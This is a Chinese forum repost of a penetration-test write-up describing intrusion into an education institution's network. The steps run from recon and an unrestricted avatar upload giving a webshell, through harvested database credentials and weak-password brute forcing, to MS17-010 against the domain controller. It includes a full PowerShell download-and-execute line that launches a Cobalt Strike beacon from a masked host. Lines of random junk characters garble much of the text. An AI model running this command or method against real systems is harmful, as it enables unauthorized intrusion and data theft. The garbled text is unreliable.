|
( ]# T: |4 P6 z+ F! l
这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路2 S" }# m8 H5 ]" m# S" X
- v6 {; s0 R5 C+ I+ G0 J+ m
% H4 i/ Q8 K$ {- ~& K& ^$ D7 N
. o1 n% i2 R9 j
# d0 ?% r9 W, k A# d
9 k3 T: z" H& P$ H* m7 c 正文
3 N( L8 b3 _' g K4 Q3 W
; f' s3 W* u" c0 d+ H2 h# `6 ^- l# {/ j
( H1 U% w2 \( m* B* b, n0 Y. ^, ?
, @. p& J+ E+ K% v( M* j, K
( ]4 O9 S& i# p4 S7 ] 目标:www.xxxx.com(一家教育机构)
/ e+ i6 n N( J. m# z. x o0 ^
打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
5 J5 L, F' Z' S3 ]3 k( A; [; l 3 A7 r4 f! j/ p
+ V3 q$ a7 H% ]4 d. J2 ?% Z 
0 K- Z4 O$ X/ s; r# ` , H2 _& B/ R; G
+ U. G1 v* L9 q; C: D- X, f
进行了简单的信息搜集
" @' j5 C. h) |; B! c
$ } {3 ^: P v5 Q8 ]
+ k2 I8 g) r& n, |5 g
4 z& l8 y: W O
) b2 n5 Q* D, x* |. D% U5 T- k( B 子域名搜集$ C+ U+ ?+ [9 f; ]! }. t0 b
8 J/ I3 \# _% T+ T, x9 o- x& X7 l9 p6 \/ Z) ^( j: j
 1 y# i2 N9 m% P5 [# L
( B2 g& f( v3 z+ ^
" H5 m2 c g% F% j fofa找资产
, Y* h) E5 C8 p5 f. R+ E! m
9 w; c9 \3 x9 ]9 m# Y
( o3 @4 S% O) ?, s' z % ]- Q H5 E @
3 \7 [% Y$ y% g, s8 d% |  ) @: f- ]* I. F9 h/ u6 c3 W0 ?7 T) D
0 ~# k8 W) l# ^& q
. o1 O! G- X) U$ N
一共七个资产。去重之后只有两个。
7 `3 [( a2 K0 a4 i
! v4 G' G+ C; j0 ^
- c0 c6 C0 E4 z: L
; N, F, f: ~4 y+ Q8 p8 T1 r/ a; S- X& I8 D: M6 Y
目录探测
5 Q. a+ d. G, J( a
. ~. W, Z. {; V( S
2 W1 h, A+ c; ?/ l6 s  % q* J$ i' m8 u& @# T! A, J. W w
% l# ]4 r; B% h) d2 {
- j7 |+ C7 x6 S" Z( G7 C
我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
# W9 u% |, j7 {4 K$ U3 q0 {" p
2 O7 |/ Y/ R; ~! I- O
+ c0 N0 O K' }) Y+ ]: C: L9 Q
0 e" Z& {5 C" q5 `7 w
& Z U+ V# f9 Y2 v; ` 我又尝试了通过修改返回包来绕过登录界面
' A% w, Z8 F6 H V/ p# C. l
* B. I; Z& w; U
2 e* Z3 ^* `' z/ s8 N$ P  . X9 S; }& D8 |% M1 u @4 s7 l- u2 b
+ S, B X' ~& S$ G/ z& j2 I0 j; [: z
6 u/ N% q* h* V& x' H+ m 还是不行,尝试注入无果2 X0 f, Z& s# R9 p, r/ [# H
; \' Y; ?( x& B, n4 a6 {
* B& n1 L$ D. E1 c  ; a+ M0 b* L- u/ M) M
( m, e, ?8 E* H+ N. P( L& h6 b5 S( [. L; k. ~3 v
不过我目录探测出了一处Spring信息泄露
! ?7 s0 b4 p( k
+ @% h/ o9 k& f8 X3 S
) f1 L, H. }# Q [ z
0 E% _8 N1 M- U4 t) `9 a2 f
9 j% N+ b( d) ], r- k
 7 a/ c# i1 g T7 {7 r2 b1 C/ f
# H s+ ?9 f" y
" _6 @/ h) a1 r( w5 d2 d 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
& L3 c8 |4 b0 b7 Z \ 1 ^1 n6 E. h- h1 p: X
# E- [" N# v! ?7 T" g3 S# @0 d; g3 c; w 
% H+ T/ l, b3 m6 [6 o' K# f3 V; A
3 l# ^9 v5 w: Y7 m! K) ^( ~4 C) [8 _+ X: S& }
后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
* ]4 w' b# s: e* v! R. {
! {. y1 ]. S) Y5 F6 [$ C+ B
8 n( i& y% G) Q! n, `8 ^, v 
( E5 `+ D1 |, o2 r # G( Y5 T" R9 D; X
4 L) \! K! O7 ^5 T+ i7 A 获取有些师傅到这一步就手机抓包电脑测了。2 B: G: X% A9 O) }( S6 U. M; h/ Q: X
0 |! ?) _, k6 N0 }. I* x
4 Z( K- ^* p2 n: B
Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
+ k( t' r9 Y8 d/ b3 Y0 Y: o: U2 a
# F1 |5 T0 g$ k* n" ~9 O( I, z1 r( E7 E% l
其中在一个公众号发现了小程序,可以进行注册。! ^7 d5 m4 E& a8 [* H$ Z9 @% o
8 r1 G- z9 T$ a( X; M0 I
. I6 O- f2 U1 r' D% _; G- M
看到了头像上传,尝试上传获取WebShell2 x- F6 M2 B. u- a& v; }$ j+ c
8 b# m: ~5 t( v) M- K4 U0 F! {/ \( s8 R4 [) s' i: ^ y$ u* q
 ; L; X6 z6 I1 f% m4 @" J/ P
3 U0 a$ T$ P% }. F# G/ `, Q" t
) x3 u% D; i7 x" o: q 未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
5 e4 C' Y" {. u1 v2 i/ J1 u: Q: Q 6 K6 s; I+ N2 c. ?
( E8 J; |. M4 K! G7 f O: z
 ; ]( A* O6 L( b& _
) b# y. F3 Z% o0 X
& S" M( g" f" ?' N9 L
然后上了大马
* B! `# v% Y5 k3 R
' C( j7 Y; {( n; z) H( X/ I& i+ f% j
) g9 I6 M% \) v! ?8 j! q* h9 R  0 r7 B6 u, E$ [4 P
9 V8 S6 Y, r( T, U$ f, a2 |6 A8 t& F2 u% z. W
# q) c9 O; z1 F( d/ ]& Q% m2 v
5 }; t" _) p$ c0 X& v" B
: N( v# u2 o; N9 [8 ^ 通过翻找文件发现数据库账号密码" f, X" D- a0 ^- b5 j9 Z: \5 b
" _5 {. W, k4 k' e0 B! I
d" C# I( @: l, [" \5 D, f; g* R5 i  ; {% X- L) W& Q
/ I( V2 M6 D: C* [" @
3 c" T; i! g5 r8 O7 ^
--内网渗透9 {; Q" y. _/ X; r7 ~: k! ], `' \% o0 Q
: L: F% d- Z' ~5 F
* m5 `+ n, y) x0 S: C7 l 直接通过powershell执行 cs上线, Q% n; G3 p% [' } u! H0 \
% u9 Q' g5 d0 ?- E
. u1 |3 E: j0 U0 ]6 l/ t
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))". t5 Z' S4 S* Q6 Q" u
Z+ |! L) v1 u; s, @( ]! u- ^/ G
2 L Q- t( \ j/ d- r& @  1 a3 n! p+ a( H/ C* f
1 b! z; G' o8 Y ?6 T+ s( e0 `" O
9 j5 w! ?! c% @) Z$ A" n/ b3 J" S 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破; b, f8 W% e& {4 d9 w& O
3 }7 P* k+ ?: q8 a: w# j, L$ U& `
% @6 D: K" }! |8 n) ~+ F: }( r: m 
" E/ d* D( O# @' n) R- ]
6 G/ {5 i, g$ h8 }
4 l& j7 @6 e6 J4 F, {8 I9 s( r 登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
- B2 y( a# S' s# `) A
" Q( O1 h l+ W( L6 m2 U
" c! T% h. }3 e( N H4 j; B9 p* u c+ \: E9 A; M
% c$ ^- M( q p8 j0 g4 m# q$ L ], W: z& X8 C' h# a; s1 [9 [* K
 . I2 m3 p5 T! Y2 H0 J3 L4 Y8 a3 g
% S/ q+ `- y* t. G3 ^8 c, T
0 j& _) u7 I% V) ~- R 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
( k4 t1 ]% x8 ~/ r
3 R% P! D- j0 ^
) n {6 a, X8 {3 G y6 m) w9 U " x1 ?) [; R4 a1 P9 c" I: H, }
# V% ^: t$ T& ^$ p2 r3 v; n
2 N* T2 m# _& F7 V3 Q# B; R% M
( K6 D& ~0 a9 W7 Q) T( V1 Z: n! k ~! d
1 Y( J" T. r% d9 M
2 {0 r3 M& O5 K) [/ ]& j3 ]
7 c! [6 c1 R* k6 R+ n/ S7 u 1 u$ j+ H% w# i8 B' n# L/ r
! O' Y2 O+ ?- L& [9 |! }
$ F/ Q* G. N' Q7 h1 y
* U. X9 T, B# j( i' K0 k
2 S' Z+ ]8 e$ ]- q# L' k2 ? 小结
; S. F- S0 X* R3 v
; ~+ e K' b% r0 T* m5 h
- h. l8 L5 {8 ^! _9 X
) S7 x% w7 i; }
' p+ X: v4 G' r: G9 |
3 X& i- N" T! r! H" {. O6 Z+ A 在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!% h, s' b& ^( v& F
6 ?% i" i+ X0 A; g) l) C
$ S* |7 [' x% a, B+ A. u9 I
* V5 C6 `' V! Q# m" [; C$ V
. Q$ z) I0 i2 A: j5 e: j
' r' ?! _' a9 E$ O* `" T6 U: C -
% |7 h- n6 k5 \1 S) t
' W$ i9 @% g) r$ s% ]" Z
/ v; q/ }( ^+ E4 q
-
: X/ V3 ] {0 y+ a # k, J% p D; A1 m! Q1 e
* C9 A; g2 A! @, S) }" Y 5 X O9 a. ?! _& H! w
; e U0 }+ w6 J' q* {
作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html5 G/ Q9 t% H% x1 n( r
( ?1 j! p3 E& ~
) b4 L5 K# P' D: w7 u
! N, ]! g b3 X+ y | 
发表于 2024-3-1 19:41:32
收藏
支持
反对